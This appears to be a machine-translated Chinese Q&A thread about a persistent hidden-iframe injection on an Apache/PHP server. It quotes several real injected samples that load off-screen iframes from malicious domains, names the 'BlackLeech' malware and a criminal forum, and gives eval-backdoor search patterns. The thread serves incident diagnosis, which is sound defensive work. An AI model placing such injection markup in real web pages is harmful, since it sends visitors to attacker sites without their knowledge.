几个月前,隐藏的iFrame开始出现在我们专用服务器上每个网站的每个页面上。当我们使用503关闭网站进行维护时,iFrame仍然在维护页面上。最终,主机阻止了iFrame的来源,但我们从未找到后门。注入的iFrame看起来像这样,但包含在样式标记中以混淆并使用各种URL:
iframe src =“http://heusnsy.nl/32283947.html ..
我们将较小的网站迁移到另一个主机,他们一直很好。
我们将主站点移动到同一主机上的新专用服务器,尽管我们努力锁定服务器 - 防火墙,限制访问,软件更新,检查每个文件 - iFrame返回。
我们到处寻找它是如何进入的 - 配置文件,htaccess - 但找不到它。
知道隐藏的iFrame注入漏洞可能在哪里?
编辑: 以下是更多细节:运行Apache和PHP的Linux机器。一切的最新版本。注入的代码如下所示:
<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..
更新: 以下是更多信息和我们学到的知识:
主机:Station CentOS Linux 6.3 - x86_64上的Linux 2.6.32-279.5.1.el6.x86_64 / Apache 2.2.15版 - PHP 5.3.3(cli)(内置:2012年7月3日16:53:21)
服务器本身没有受到损害。
包括(apache / php)在内的所有服务都升级到我们系统可用的最新版本。
没有帐户(ftp或其他方式)遭到入侵。
恶意软件会在多个受感染的网站上同时更改其目标网址(iframe src =)。 (由unmaskparasites.com提供)
在更改src目标期间,没有执行/运行流氓或隐藏进程。
TCPDUMP从端口80 tcp中删除了恶意软件的代码,但是在收到恶意软件的用户的GET请求中没有发现任何异常 - 在相应的apache访问日志中也没有发现任何异常。
在切换iFrame的src url地址期间,网站文件或httpd / php二进制文件没有以任何方式更改 - 由md5sum check提供。
在更改期间,已知服务的已知端口上未建立恶意连接。防火墙负责其余部分。
rkhunter和maldet没有结果。
在此服务器上的所有帐户和网站上,恶意软件iFrame会在具有此标记的任何网页上的第一个"</script>"标记之后立即触发并注入。
恶意软件被注入静态页面和没有数据库连接的站点上。 (页面足以有<head> </script></head>个标签)
没有安装流氓apache模块或php模块(不包括mycript.so)。大多数默认的apache模块都被挂起并注释掉了。
恶意软件不会一直存在。它来来去去,有时会关闭几个小时,然后出现在几个用户身上并再次出去。非常难以追踪。
100%的php代码和我们网站上运行的大多数javascript代码(除了phpmyadmin)都是自定义编码的。唯一不存在的是Jquery库。
服务器是高流量机器,日志中的搜索/匹配非常慢。每周访问日志可以超过15GB。
情况就是这样......这不再是受损账户,黑客文件,流氓脚本的问题。这是我们迄今为止看到的任何东西,其原因隐藏在apache / php本身的某个地方。 (至少这是我们的想法)。非常感谢任何帮助或想法。
以下是iFrame注入的示例:
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </ style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >
</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div>
document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin
</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>
<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>
答案 0 :(得分:3)
检查一下......装满你的服务器的程序的恶作剧作者被称为“Left4Dead” - 他的iframe注入doo-hicky被称为“BlackLeech”。你可以在Damagelab .org(CRIMINAL FORUM !!)上找到这个绅士和他的广告。
每次root登录时,恶意软件都会停止所有活动,或者如果您通过SSH连接到服务器。它还监视系统监视工具:|
注意你的线程如何被列为参考:))
如果您需要翻译帮助,请打我!
答案 1 :(得分:0)
我会粗略地将初始感染的来源分为两组: (1)您的网站使用某些漏洞遭到入侵(如果您使用的是像Wordpress或Joomla这样的开源引擎,您应该检查当前的漏洞,可以从exploit-db.com开始) (2)您的网站的CMS使用弱凭证访问(正如您在问题的评论中已经注明的那样)
代码重新出现表明感染源仍然存在。通常它是一个PHP脚本,它接收一个字符串作为参数(可能以base64或其他方式编码),使用eval解码并执行它。我猜你没有更改域名,所以坏人在他的机器上有一些脚本,经常请求他的“backdor”并重新感染你的系统。
你如何找到这个脚本?你的选择:
请参阅访问日志。查找可疑字符串,例如something.php?e = asSdfdSsafas ==或对不属于您网站的脚本的POST请求。
使用字符串搜索扫描所有文件,查找“eval($ _ POST ['”或“eval($ _ GET ['”或只是“eval”,然后找到不太可能的文件)您网站引擎的一部分。
希望这会有所帮助 最好成绩
答案 2 :(得分:0)
几天前,我发生了一些事件,其中有一些横幅填充了我管理的网站。最后我可以摆脱它。您可以查看完整的答案here。
问题是javascript代码被附加到textareas。可能是,浏览器被感染并附加了导致iframe加载的不需要的额外代码。
您的情况有所不同,但也许可以提供帮助:如果您使用WYSIWYG编辑器处理后端内容,或者其他人正在执行此操作,则有可能通过附加的javascript创建iframe对textareas或输入。
一种不同的方法。希望能帮助到你!